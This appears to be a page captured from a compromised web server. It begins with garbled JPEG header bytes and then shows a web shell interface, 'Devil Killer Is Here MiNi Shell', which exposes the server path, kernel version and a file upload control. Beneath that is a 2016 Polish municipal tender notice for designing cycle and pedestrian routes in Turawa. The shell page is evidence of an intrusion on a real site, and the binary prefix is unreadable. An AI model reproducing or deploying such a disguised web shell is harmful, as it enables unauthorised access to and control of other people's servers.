JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160622/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160622/98925-N-2016.html

<p class="kh_header"><b>Turawa: Opracowanie kompleksowej dokumentacji projektowej 
dla zadania: Budowa dróg rowerowych 
i tras pieszo-rowerowych na terenie gminy Turawa na podstawie opracowanej koncepcji
(z podziałem na trzy zadania częściowe)</b><br>
<b>Numer ogłoszenia: 98925 - 2016; data zamieszczenia: 22.06.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Turawa , ul. Opolska 39c, 46-045 Turawa, woj. opolskie, tel. 077 4212012, faks 077 4212073.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.turawa.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie kompleksowej dokumentacji projektowej 
dla zadania: Budowa dróg rowerowych 
i tras pieszo-rowerowych na terenie gminy Turawa na podstawie opracowanej koncepcji
(z podziałem na trzy zadania częściowe).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest: 
Opracowanie kompleksowej dokumentacji projektowej dla zadania: Budowa dróg rowerowych i tras pieszo-rowerowych na terenie gminy Turawa na podstawie opracowanej koncepcji - wraz z uzyskaniem decyzji o zezwoleniu na realizację inwestycji drogowej (ZRiD), zgodnie z ustawą z dnia 10 kwietnia 2003r. o szczególnych zasadach przygotowania i realizacji inwestycji w zakresie dróg publicznych (tekst jednolity Dz. U. z 2008r. Nr 193 poz. 1194 ze zm.).
2.	Dokumentacja projektowa obejmuje budowę dróg rowerowych i tras pieszo - rowerowych łączących Opole z miejscowościami: Zawada, Kotórz Mały, Turawa oraz terenami rekreacyjnymi nad Jeziorem Turawskim. 
3.	Zakres zamówienia został podzielony na 3 zadania częściowe:
3.1.	Zadanie częściowe nr I - dokumentacja projektowa - Budowa dróg rowerowych i tras pieszo-rowerowych na terenie gminy Turawa - odcinek nr 1 - początek odcinka rozpoczyna się w miejscu włączenia do istniejącego ciągu pieszo - rowerowego  na rondzie z ul. Oleską (DK45) w Zawadzie. Zaprojektować należy przedłużenie istniejącego ciągu pieszo-rowerowego wzdłuż ul. Turawskiej po jej południowej stronie na odcinku ok. 180 m, a następnie jego kontynuację wzdłuż drogi powiatowej przez miejscowość Kotórz Mały i Turawę.  W pobliżu dworca kolejowego w miejscowości Kotórz Mały należy zaprojektować parking dla rowerów w formule Bike and Ride (B+R) umożliwiający pozostawienie roweru i dalszą podróż koleją. Na rzece Mała Panew w miejscowości Turawa należy zaprojektować kładkę pieszo - rowerową zlokalizowaną równolegle do istniejącego mostu po stronie zachodniej. Tuż za mostem należy zaprojektować rozwiązanie komunikacyjne skrzyżowania dróg powiatowych, o długości około 6,3 km.
3.2.	Zadanie częściowe nr II - dokumentacja projektowa - Budowa dróg rowerowych i tras pieszo-rowerowych na terenie gminy Turawa - odcinek nr 2 - obejmuje odcinek od zakończenia zadania częściowego nr I, czyli od skrzyżowania dróg powiatowych za mostem na rzece Mała Panew w Turawie do skrzyżowania z ul. Harcerską w okolicy Jeziora Turawskiego, o długości około 2,8 km.
3.3.	Zadanie częściowe nr III - dokumentacja projektowa - Budowa dróg rowerowych i tras pieszo-rowerowych na terenie gminy Turawa - odcinek nr 3 - rozpoczyna się na granicy miasta Opole w pobliżu centrum handlowego Turawa Park w miejscu włączenia do istniejącej drogi serwisowej. Drogę rowerową należy zaprojektować w ciągu gruntowych dróg leśnych i polnych do granic miejscowości Zawada, a następnie ul. Brzegową, ul. Zieloną, ul. Wodociągową do włączenia w istniejący ciąg pieszo - rowerowy na ul. Oleskiej (DK 45), następnie trasa rowerowa biegnie drogą serwisową, aż do ronda z ul. Turawską (DP1705) oraz istniejącym ciągiem pieszo - rowerowym, o długości około 4,6 km.
4.	Zakres dokumentacji oraz parametry techniczne projektowanych dróg rowerowych i tras pieszo-rowerowych opracować należy na podstawie projektu koncepcyjnego  stanowiącego załączniki nr 9a - 9f do niniejszej SIWZ. 
5.	Zakres przedmiotu zamówienia w każdym z zadań częściowych należy podzielić na odcinki obejmujące: 
5.1.	drogi rowerowe i trasy pieszo - rowerowe  usytuowane w obszarach zabudowanych w liniach rozgraniczających drogi powiatowej;
5.2.	drogi rowerowe i trasy pieszo - rowerowe  usytuowane w obszarach zabudowanych  na nieruchomościach stanowiących własność Gminy Turawa i własność osób trzecich oraz w obszarach niezabudowanych;  
5.3.	place i parkingi  wraz elementami zagospodarowania w skali nie mniejszej niż 1:50,
5.4.	mosty i przepusty  w skali nie mniejszej niż 1:50,  
6.	W skład kompleksowej dokumentacji projektowej wchodzą: 
6.1.	mapy do celów projektowych; 
6.2.	projekt budowlano - wykonawczy z branżami w wersji papierowej -                      5 egzemplarzy;
6.3.	przedmiary robót w wersji papierowej - 4 egzemplarze;
6.4.	kosztorys inwestorski w wersji papierowej - 4 egzemplarze;
6.5.	specyfikacje techniczne wykonania i odbioru robót budowlanych (STWiORB) w wersji papierowej - 2 egzemplarze;
6.6.	projekt stałej organizacji ruchu wraz projektem oznakowania tras zgodnie z przyjętym kompleksowym systemem identyfikacji wizualnej infrastruktury rowerowej Aglomeracji Opolskiej - 4 egzemplarze; Księga identyfikacji wizualnej w posiadaniu Zamawiającego udostępniona zostanie Wykonawcy przed podpisaniem umowy;
6.7.	projekty podziału działek - 6 egzemplarzy;
6.8.	uzgodnienia rozwiązań projektowych z zarządcami dróg.
6.9.	operat dendrologiczny - 4 egzemplarze; 
6.10.	kompletna dokumentacja projektowa w zapisie cyfrowym w plikach z rozszerzeniem .doc (część opisowa) oraz .pdf (całość) - 2 szt.
7.	Rozwiązania projektowe muszą być zgodnie z warunkami technicznymi oraz przepisami prawnymi obowiązującymi na dzień sporządzania dokumentacji.
8.	Wykonawca zobowiązuje się do wykonania przedmiotu umowy z należytą starannością w sposób zgodny z zasadami współczesnej wiedzy technicznej. 
9.	Wykonana dokumentacja projektowa powinna być branżowo i technicznie wzajemnie skoordynowana oraz kompletna z punktu widzenia celu, któremu ma służyć. Musi zawierać wymagane  opinie, uzgodnienia, zgody i pozwolenia, a także potwierdzenia sprawdzeń rozwiązań projektowych w zakresie wynikającym z przepisów. 
10.	W ramach umowy Wykonawca, na wniosek Zamawiającego, dwukrotnie uaktualni (bez dodatkowego wynagrodzenia) kosztorys inwestorski w oparciu o poziom cen występujący w tym czasie. 
11.	Wizja lokalna - zaleca się, aby każdy z wykonawców dokonał wizji lokalnej celem sprawdzenia warunków związanych z wykonaniem prac będących przedmiotem niniejszego zamówienia oraz celem uzyskania dodatkowych informacji koniecznych i przydatnych do przygotowania oferty, gdyż wyklucza się możliwość roszczeń Wykonawcy z tytułu błędnego skalkulowania ceny lub pominięcia elementów niezbędnych do wykonania umowy. Koszt wizji lokalnej poniesie Wykonawca.
12.	Do obowiązków Wykonawcy należy: 
12.1.	zweryfikowanie lokalizacji ścieżek i tras pieszo-rowerowych ze stanem faktycznym w terenie;
12.2.	uzyskanie materiałów wyjściowych do projektowania;
12.3.	podział działek w zakresie niezbędnym do realizacji inwestycji;
12.4.	opracowanie harmonogramu prac projektowych dla zapewnienia możliwości monitorowania postępu prac projektowych - Wykonawca zobowiązany jest przedłożyć harmonogram prac projektowych w terminie 7 dni od daty podpisania umowy. Harmonogram powinien obejmować w szczególności terminy wykonania następujących prac:
12.4.1.	opracowanie map do celów projektowych; 
12.4.2.	opracowanie i przedstawienie Zamawiającemu do akceptacji wstępnego projektu budowlano-wykonawczego wraz z projektem podziału nieruchomości;
12.4.3.	dokonanie wszelkich niezbędnych uzgodnień oraz uzyskanie zezwoleń i decyzji poszczególnych zarządców dróg i sieci; 
12.4.4.	opracowanie projektów podziałów nieruchomości niezbędnych do realizacji przedmiotu zamówienia; 
12.4.5.	opracowanie kosztorysów, przedmiarów i specyfikacji technicznych; 
12.4.6.	opracowanie i złożenie wniosku o ZRID; 
12.5.	organizacja i udział w spotkaniach (organizowanych z inicjatywy własnej lub Zamawiającego) z przedstawicielami władz samorządowych, właścicielami (zarządcami) terenów, na których zlokalizowana jest inwestycja i innymi zainteresowanymi stronami;
12.6.	 uczestniczenie w Radach Technicznych i innych spotkaniach na żądanie Zamawiającego;
12.7.	sporządzanie protokołów z rozpatrzenia uwag i wniosków do opracowywanej dokumentacji projektowej;
12.8.	opracowanie prawidłowego i kompletnego wniosku o wydanie decyzji o zezwoleniu na realizację inwestycji drogowej (ZRiD).
12.9.	składanie pisemnych wyjaśnień dot. zapytań do opracowanej dokumentacji zadawanych w trakcie postępowania przetargowego prowadzonego dla wyboru wykonawcy robót - w terminie do 3-dni roboczych od przesłania zapytania.
13.	Wykonawca odpowiada za wady dokumentacji projektowej. Ujawnione wady Wykonawca zobowiązany jest usunąć niezwłocznie w terminie określonym przez Zamawiającego. 
14.	Wykonawca zobowiązany jest do sprawowania nadzoru autorskiego w trakcie realizacji robót objętych dokumentacją projektową sporządzoną w oparciu o niniejsze zamówienie. 
15.	W ramach nadzoru autorskiego inwestycji Wykonawca zobowiązany jest do: 
15.1.	wykonywania projektów zamiennych, 
15.2.	wyjaśniania wykonawcy prac objętych dokumentacją budowlano - wykonawczą wątpliwości powstałych w toku realizacji robót, 
15.3.	niezwłocznego wykonania poprawek i uzupełnień w dokumentacji projektowej.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Zamawiający przewiduje udzielenia zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt 6  Prawa zamówień publicznych.	
Przedmiotem zamówień uzupełniających jest powtórzenie tego samego rodzaju usług co w zamówieniu podstawowym, stanowiących nie więcej niż 50% wartości zamówienia podstawowego, zgodnie z art. 67 ust. 1 pkt 6  Prawa zamówień publicznych</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7, 71.24.80.00-8, 71.32.23.00-4, 90.72.00.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Ustala się wadium w wysokości: 
1.	3 000,00 złotych,  (słownie: trzy tysiące złotych)  dla zadania częściowego nr I.
2.	1 000,00 złotych,  (słownie: jeden tysiąc złotych)  dla zadania częściowego nr II.
3.	1 000,00 złotych,  (słownie: jeden tysiąc złotych)  dla zadania częściowego nr III</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowych wymagań.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Udokumentowanie wykonania, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych w sposób należyty, głównych usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane, co najmniej dwóch zadań o charakterze i złożoności porównywalnej z zakresem niniejszego zamówienia, polegających na:
1.	opracowaniu dokumentacji projektowej budowy, przebudowy lub remontu ścieżek rowerowych, lub chodników, lub dróg o długości min. 800 mb wraz z uzyskaniem na podstawie tej dokumentacji ostatecznej decyzji o zezwoleniu na realizację inwestycji drogowej (ZRiD) lub decyzji pozwolenia na budowę - dotyczy zadania częściowego nr I, II i III;

Ocena spełnienia warunku nastąpi na podstawie złożonego przez Wykonawcę:
1)	wykazu wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, (zgodnie z załącznikiem nr 5 do  SIWZ);
2)	dowodu czy usługi te zostały wykonane lub są wykonywane należycie.
Dowodem o którym mowa powyżej jest: 
a) poświadczenie, z tym że w odniesieniu do nadal wykonywanych usług okresowych lub ciągłych poświadczenie powinno być wydane nie wcześniej niż na 3 miesiące przed upływem terminu składania ofert;
b) w przypadku zamówień na usługi - oświadczenie wykonawcy - jeżeli z uzasadnionych przyczyn o obiektywnym charakterze wykonawca nie jest w stanie uzyskać poświadczenia, o którym mowa w pkt a).
W przypadku gdy zamawiający jest podmiotem, na rzecz którego usługi wskazane w wykazie, o którym mowa w punkt 1) zostały wcześniej wykonane, wykonawca nie ma obowiązku przedkładania dowodów, o których mowa w punkt 2).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowych wymagań.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponowanie osobami zdolnymi do wykonania zamówienia, do realizacji zamówienia zapewnią: 
1.	osobę posiadającą uprawnienia do projektowania w specjalności drogowej oraz należącą do właściwej Izby Samorządu Zawodowego - dotyczy zadania częściowego nr I, II i III;
2.	osobę posiadającą uprawnienia do projektowania w specjalności instalacyjnej sanitarnej oraz należącą do właściwej Izby Samorządu Zawodowego - dotyczy zadania częściowego nr I, II i III;
3.	osobę posiadającą uprawnienia do projektowania w specjalności mostowej oraz należącą do właściwej Izby Samorządu Zawodowego - dotyczy zadania częściowego nr I;
4.	osobę posiadającą uprawnienia do projektowania w specjalności instalacyjnej elektrycznej oraz należącą do właściwej Izby Samorządu Zawodowego - dotyczy zadania częściowego nr I i III;
5.	osobę posiadającą świadectwo uprawnień zawodowych w dziedzinie geodezji i kartografii - dotyczy zadania częściowego nr I, II i III.

Ocena spełnienia warunku nastąpi na podstawie złożonego przez Wykonawcę:
1)	wykazu osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informację o podstawie do dysponowania tymi osobami (zgodnie  załącznikiem nr 6 do SIWZ);
2)	oświadczenia, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia jeżeli ustawy nakładają obowiązek posiadania takich uprawnień (zgodnie z załącznikiem nr 7 do  SIWZ).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowych wymagań.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	formularz ofertowy  (zgodnie z  załącznikami nr 1a, 1b, 1c  do SIWZ - odpowiednio do danej części zamówienia);
2.	oświadczenie o spełnieniu warunków udziału w postępowaniu (zgodnie z załącznikiem nr 2 do SIWZ).</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Okres gwarancji - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonania istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy. 
